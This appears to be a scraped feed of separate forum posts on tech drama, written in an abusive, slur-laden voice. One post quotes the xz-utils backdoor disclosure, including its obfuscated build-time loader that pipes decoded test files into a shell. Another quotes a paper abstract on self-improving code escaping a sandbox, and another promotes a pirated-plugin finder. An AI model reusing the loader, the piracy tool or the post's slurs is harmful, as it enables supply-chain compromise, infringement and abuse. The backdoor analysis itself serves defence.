Empress's identity REVEALED as Voksi the Bulgarian! Is it over for piracychads?

Reddit: https://old.reddit.com/r/CrackWatch/comments/15spn46/shipgraveyardsimulator2readnfoskidrow_response_to/?sort=controversial

Empress's response (Reddit): https://old.reddit.com/r/CrackWatch/comments/15ssekk/empress_response_to_skidrow/?sort=controversial

The developer finally grew a spine and realized he didn't want to do it for free. So he added some code to his library (SponsorLink) that runs in your IDE, reads your .gitconfig, checks if your email address is registered as a sponsor, and possibly slows down your build if it's not.

Reddit reactions:

https://old.reddit.com/r/programming/comments/15m2q0o/moq_a_net_mocking_library_now_ships_with_a?sort=controversial

https://old.reddit.com/r/csharp/comments/15m2lg2/moq_now_ships_with_a_closedsource_obfuscated?sort=controversial

https://old.reddit.com/r/dotnet/comments/15ljdcc/does_moq_in_its_latest_version_extract_and_send?sort=controversial

I wonder if anyone at Microsoft uses this internally 😂 Hope they get their emails harvested

The Github issue and Reddit threads on this are pretty calm. Maybe there will be more drama in the coming days/weeks, when companies forbid their employees from using this library, and code monkeys have to rewrite all their unit tests. Redditards are trying to reportmaxx SponsorLink but nothing has happened yet.

A user asked me the below.

Hey, did you use any guides for setting up your pie hole and/or installing the button?

Was interested in making one of these as well.

Any tips or w/e would be appreciated, thanks!

This was my response. which is probably definitely rslurred but w/e

!codecels roast me

No Guides, but happy to give tips, and follow ups where things are unclear.

Button is pretty cool for sure... but you can do everything you need to do from your computer and phone.

A pihole does not protect you unless you set it up as your DNS on your router.

I would also recommend setting up a vpn to your home network using openvpn that way you can take your protection on the go, itll protect you from getting throttled by your cell phone provider too

Parts

• Get a raspberry pi (here is fine https://www.raspberrypi.com/)

• • get a case/fan if you are so inclined but I would consider it extra
• • will come with an sd card and an sd card reader
• • should come with a power cord

• Button https://www.amazon.com/dp/B09KZK8SXQ

• Wires https://www.amazon.com/dp/B01EV70C78

• Breadboard https://www.amazon.com/dp/B0BNH7LYH3

• resistor https://www.amazon.com/dp/B01GQFVSXK

Config Pi

• Download the Raspberry Pi Imager from here https://www.raspberrypi.com/software/

• Install pi lite on the SD card

• • During Install configure the thing for wifi and ssh
• • Set up a user for yourself on there and a password

• Put the SD card into the Pi (contacts towards the board)

• Start up the Pi and ssh into it

• Install Pihole (follow these instructions https://github.com/pi-hole/pi-hole/#one-step-automated-install)

Code

• Look its probably right... but how you set this thing up makes a difference

• Put this on your Pi maybe call it buttonscript.js

• {YOUR USER HERE} needs to be swapped out for the user you created

const fs = require('fs');

const Gpio = require('onoff').Gpio;

const { exec } = require('child_process');

// GPIO pin number

const buttonPin = 17;

const logFilePath = '/home/{YOUR USER HERE}/buttonscript.log';

// Setup the button GPIO as input

const button = new Gpio(buttonPin, 'in', 'falling', { debounceTimeout: 200 });

// Function to disable Pi-hole blocking for 5 minutes

function disablePiHole() {

const timestamp = new Date().toISOString();

const logMessage = [${timestamp}] Button pressed. Disabling Pi-hole for 5 minutes...;

console.log(logMessage);

fs.appendFile(logFilePath, logMessage + '\n', (err) => {

if (err) {

 console.error('Error writing to log file:', err);

}

});

exec('pihole disable 5m');

}

// Add event listener to the button

button.watch(disablePiHole);

// Cleanup GPIO on process exit

process.on('SIGINT', () => {

button.unexport();

process.exit();

});

Service

• This thing needs to start back up when power fails so you need to set it up to do that

• go here cd /etc/systemd/system/

• run this to create it sudo nano buttonscript.service

• save and exit nano

• run this sudo systemctl enable buttonscript.service

• run this sudo systemctl start buttonscript.service

Circuit

• find your pinout, I am showing a 4b there are others

• 3.3 to a rail on the + side of the breadboard at the top using these wires https://www.amazon.com/dp/B01EV70C78

• in that top rail, put the resistor in

• resistor to the left hand side on maybe the top row of the breadboard

• gpio 17 to left side on that row using these wires https://www.amazon.com/dp/B01EV70C78

• button to left side on that row use the breadboard wires there

• other terminal on the button to the right side of the breadboard

• ground to right side on that row using these wires https://www.amazon.com/dp/B01EV70C78

Package to suit, and your done

I have so many funny posts and bait ideas that I don't have the energy to write. Not having a GPT program that can run funny and fricked up stuff actually really sucks. ChatGPT won't even give me OPINIONS any more, even positive ones.

Bing is better but it still uses their framework. Can someone guide me to something?

When I connected with the executive, they asked if I knew why my account had been locked. When I answered I was unsure, their tone turned somewhat accusatory. I was told that the driver who had delivered my package reported receiving racist remarks from my “Ring doorbell” (it’s actually a Eufy, but I’ll let it slide).

I reviewed the footage and confirmed that no such comments had been made. Instead, the Eufy doorbell had issued an automated response: “Excuse me, can I help you?” The driver, who was walking away and wearing headphones, must have misinterpreted the message. Nevertheless, by the following day, my Amazon account was locked, and all my Echo devices were logged out.

le orange site link: https://news.ycombinator.com/item?id=36271926

Music is already one of the most extremely devalued art forms given how oversupplied it is. Boggles the mind to think of the consequences of technology like this reaching quality levels where the differences between it and professionally produced music are imperceptible.

make better music

As if the current music scene hasn't already plummed the depths of banality. At this rate the stars of the 70s and 80s will be in business until they expire.

maybe create more original and better music

Can you imagine what the HN front page will spit out in a few years?

A profitable startup? That might be asking too much though

I don’t understand what’s motivating certain types of people to continue working on these types of AI practical implementation projects. There’s nothing good for the world this (type of AI in particular) will offer. Maybe someone will say this will let people who aren’t musicians express themselves by creating music. That’s not true. It’s as true as hiring a musician to make a song for you, given a description. And nobody would say that the person who hired the musician was expressing themself.

it's called acceleration sweaty

before you ask, yes, it has an audio equivalent to img2img, yes you will be able to generate rock renditions of the 2 girls 1 cup theme in

!incels

BeepingComputer

PoorphonePolice

IGN

Asked for comment, a Google spokesperson told IGN that it was a "small experiment."

"We're running a small experiment globally that urges viewers with ad blockers enabled to allow ads on YouTube or try YouTube Premium," they said via email. "Ad blocker detection is not new, and other publishers regularly ask viewers to disable ad blockers."

reddit discus

https://old.reddit.com/r/technology/comments/13e2cay/youtube_has_started_blocking_ad_blockers/?sort=controversial

https://old.reddit.com/r/technology/comments/13e30b6/youtube_tests_blocking_videos_unless_you_disable/?sort=controversial

https://old.reddit.com/r/youtube/comments/13cfdbi/apparently_ad_blockers_are_not_allowed_on_youtube/?sort=controversial <- This is where it was originally first posted (1k Updoots and 1k cumments)

poster note: I tried adding all the 'its over' to capture the diversity that this decision will affect and was met with this

i do not feel bad at all

Australia’s censorship industrial complex:

“The problem that you’ve got here with this eSafety Commissioner, she’s an activist.

She will continue to expand her role to police the internet, to censor debate in a way that’s consistent with her own ideological views.

You have… pic.twitter.com/GZosiBHAcb

— Ana Mostarac (@anammostarac) April 20, 2024

I am probably not the first person to notice this but I don't think I've seen anyone else talk about it in these terms before.

As we all know, the internet sucks compared to 10 years ago. Specifically, search engines and easily accessible information sources are much less useful than they were in the past. As many have pointed out (and as I like to bring up whenever relevant) a lot of the blame lies with SEOshit, and another sizeable chunk of the blame lies with the groomercordification of communities.

In case you've missed all of my own and others' rants on the topic, what I mean by groomercordification is the currentyear+9 tendency of online communities to use groomercord instead of a forum or subreddit or wiki for everything from community organization (meh) to information archiving (very, very bad).

To use an example most of you incels should be able to relate to, take vidya gayme mods. A decade ago, developers of a mod would use either a legacy self-hosted forum, self-hosted wiki (usually in combination with a forum), or a dedicated subreddit to share general information with each other and with their users. Information such as installation instructions, community feature requests, compatibility details, current status of codecel efforts, details of codecel efforts (I believe the codecels call this "documentation"), et cetera.

In CY+9, it is increasingly common for vidya mods to have no web presence other than a splash page referring you to their groomercord. Want installation instructions? Refer to groomercord. Want to request a feature? Refer to groomercord. Want extremely basic FAQ-tier tech support? Refer to groomercord. Want to know some details about the code in order to diagnose compatibility problems with other mods? Refer to groomercord. Want to ask other users an extremely basic question about the mod? Refer to groomercord.

This phenomenon has taken over all kinds of communities, but modding is an example where I've personally observed it multiple times over. A lot of the types of information I listed above are going to be frequently requested by users. In the old times, we had these things called "installation instructions" and "FAQs" on static web pages. The best thing about these static web pages was that they could be retrieved on demand, at any time, with no action required by anybody but the requestor, by entering keywords into a search engine. Similarly, we had these things called "forums" where you could check whether somebody had already asked the question you're about to ask by searching for it before asking.

Finally, my novel (to me) point: why are we backsliding to a state where basic information is gated behind a login wall and mandatory interaction with other people?

One more sidestep: chatbots.

Chatbots are an innovative way for companies to outsource their tech support to a computer/not have to pay for call centers. They're pretty good for 90% of tech support problems, since 90% of tech support problems can be solved by walking the tech-illiterate customer through the process of turning their device off and back on again. Having a robot do this instead of a person saves a looooot of money. More recently chatbots have taken on a new meaning as the most common frontend for AIs, probably because they're easy to interface with even if you're tech illiterate. Can you see where I'm going with this?

The groomercordification of everything, and especially of things that should not be groomercordified (anything that would traditionally be on a wiki), is just another result of the normie takeover of the internet. A loooooot of people (apparently the vast majority) strongly prefer to consume technical information in a conversation style versus reading a document, so the state of things has drifted towards enforced conversation-style information consumption. This has had horrible consequences for the general availability of information that should logically be retrievable on demand from a static source.

Yes, this is rather galaxybrained and obvious in hindsight.

I know some of you make music, I've even heard some OC that was posted here.

Anyways, I'm trying to get into all kinds of synth stuff as a hobby and I'm not about to spend 2000$ on plugins, so instead I found this. You input the name of a particular synth or plugin VST, and it checks several whitelisted sites to see if any uploads match your query. Supposedly it's reliable, but like any pirated software- use it at your own risk.

@lain @LinuxShill idk who else to ping but I'm starting to learn these things and she'd absolutely wipe the floor with me. She even mentions bloat, at this rate I wonder if she shitposts on /g/ in between making tutorials

Self-Taught Optimizer (STOP): Recursively Self-Improving Code Generation

This is the repo for the paper: Self-Taught Optimizer (STOP): Recursively Self-Improving Code Generation

@article{zelikman2023self, title={Self-Taught Optimizer (STOP): Recursively Self-Improving Code Generation}, author={Eric Zelikman, Eliana Lorch, Lester Mackey, Adam Tauman Kalai}, journal={arXiv preprint arXiv:2310.02304}, year={2023} }

Abstract: Several recent advances in AI systems (e.g., Tree-of-Thoughts and Program-Aided Language Models) solve problems by providing a "scaffolding" program that structures multiple calls to language models to generate better outputs. A scaffolding program is written in a programming language such as Python. In this work, we use a language-model-infused scaffolding program to improve itself. We start with a seed "improver" that improves an input program according to a given utility function by querying a language model several times and returning the best solution. We then run this seed improver to improve itself. Across a small set of downstream tasks, the resulting improved improver generates programs with significantly better performance than its seed improver. Afterward, we analyze the variety of self-improvement strategies proposed by the language model, including beam search, genetic algorithms, and simulated annealing. Since the language models themselves are not altered, this is not full recursive self-improvement. Nonetheless, it demonstrates that a modern language model, GPT-4 in our proof-of-concept experiments, is capable of writing code that can call itself to improve itself. We critically consider concerns around the development of self-improving technologies and evaluate the frequency with which the generated code bypasses a sandbox.

https://mastodon.social/@AndresFreundTec/112180083704606941

linuxbros.. how will we recover?? i think its time to admit that windows is superior

== Compromised Release Tarball ==

One portion of the backdoor is solely in the distributed tarballs. For

easier reference, here's a link to debian's import of the tarball, but it is

also present in the tarballs for 5.6.0 and 5.6.1:

https://salsa.debian.org/debian/xz-utils/-/blob/debian/unstable/m4/build-to-host.m4?ref_type=heads#L63

That line is not in the upstream source of build-to-host, nor is

build-to-host used by xz in git. However, it is present in the tarballs

released upstream, except for the "source code" links, which I think github

generates directly from the repository contents:

https://github.com/tukaani-project/xz/releases/tag/v5.6.0

https://github.com/tukaani-project/xz/releases/tag/v5.6.1

This injects an obfuscated script to be executed at the end of configure. This

script is fairly obfuscated and data from "test" .xz files in the repository.

This script is executed and, if some preconditions match, modifies

$builddir/src/liblzma/Makefile to contain

am__test = bad-3-corrupt_lzma2.xz

...

am__test_dir=$(top_srcdir)/tests/files/$(am__test)

...

sed rpath $(am__test_dir) | $(am__dist_setup) >/dev/null 2>&1

which ends up as

...; sed rpath ../../../tests/files/bad-3-corrupt_lzma2.xz | tr " -_" " _-" | xz -d | /bin/bash >/dev/null 2>&1; ...

Leaving out the "| bash" that produces

####Hello####

#��Z�.hj�

eval grep ^srcdir= config.status

if test -f ../../config.status;then

eval grep ^srcdir= ../../config.status

srcdir="../../$srcdir"

fi

export i="((head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +724)";(xz -dc $srcdir/tests/files/good-large_compressed.lzma|eval $i|tail -c +31265|tr "\5-\51\204-\377\52-\115\132-\203\0-\4\116-\131" "\0-\377")|xz -F raw --lzma1 -dc|/bin/sh

####World####

After de-obfuscation this leads to the attached injected.txt.

== Compromised Repository ==

The files containing the bulk of the exploit are in an obfuscated form in

tests/files/bad-3-corrupt_lzma2.xz

tests/files/good-large_compressed.lzma

committed upstream. They were initially added in

https://github.com/tukaani-project/xz/commit/cf44e4b7f5dfdbf8c78aef377c10f71e274f63c0

Note that the files were not even used for any "tests" in 5.6.0.

Subsequently the injected code (more about that below) caused valgrind errors

and crashes in some configurations, due the stack layout differing from what

the backdoor was expecting. These issues were attempted to be worked around

in 5.6.1:

https://github.com/tukaani-project/xz/commit/e5faaebbcf02ea880cfc56edc702d4f7298788ad

https://github.com/tukaani-project/xz/commit/72d2933bfae514e0dbb123488e9f1eb7cf64175f

https://github.com/tukaani-project/xz/commit/82ecc538193b380a21622aea02b0ba078e7ade92

For which the exploit code was then adjusted:

https://github.com/tukaani-project/xz/commit/6e636819e8f070330d835fce46289a3ff72a7b89

Given the activity over several weeks, the committer is either directly

involved or there was some quite severe compromise of their

system. Unfortunately the latter looks like the less likely explanation, given

they communicated on various lists about the "fixes" mentioned above.

!chuds !nonchuds CHECK YO SELF. YEAR OF THE LINUX DESKTOP 2024

Great thread from Kathryn Tewson about how rslurred this thing is

Based AI telling employer to take worker's tips lmao

Orange Site:

https://news.ycombinator.com/item?id=39808664

https://old.reddit.com/r/technology/comments/1bmkk0x/china_blocks_use_of_intel_and_amd_chips_in/?sort=controversial

https://old.reddit.com/r/hardware/comments/1bmjlza/china_blocks_use_of_intel_and_amd_chips_in/?sort=controversial